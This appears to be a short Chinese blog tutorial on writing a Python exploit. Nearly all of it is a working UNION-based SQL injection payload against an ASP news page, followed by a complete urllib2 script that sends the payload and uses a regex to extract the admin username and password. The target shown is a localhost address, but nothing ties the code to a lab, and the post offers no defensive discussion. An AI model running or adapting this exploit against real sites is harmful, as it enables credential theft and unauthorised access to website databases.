摘要
python版本
python2.7 停止更新
python3 学的话就要学习python3
python编写exp
注入的exp payload
shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin
coding:utf-8 设置编码
import 导入模块导入urllib2 re
首先 设置 pydev工具 新建一个python项目 新建exp01.py文件
#coding:utf-8 import urllib2 import re def get_page(url): #获取网页源码 payload='/shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin' req = urllib2.Request(url+payload) response = urllib2.urlopen(req) page = response.read() return page def exploit(url): #利用函数 html = get_page(url) try: m =re.search('~(.*?)~',html) return m.group(1) except: return '' url = 'http://127.0.0.1:99' print exploit(url)
您可以选择一种方式赞助本站
支付宝转账赞助
目前评论:0 条
发表评论 取消回复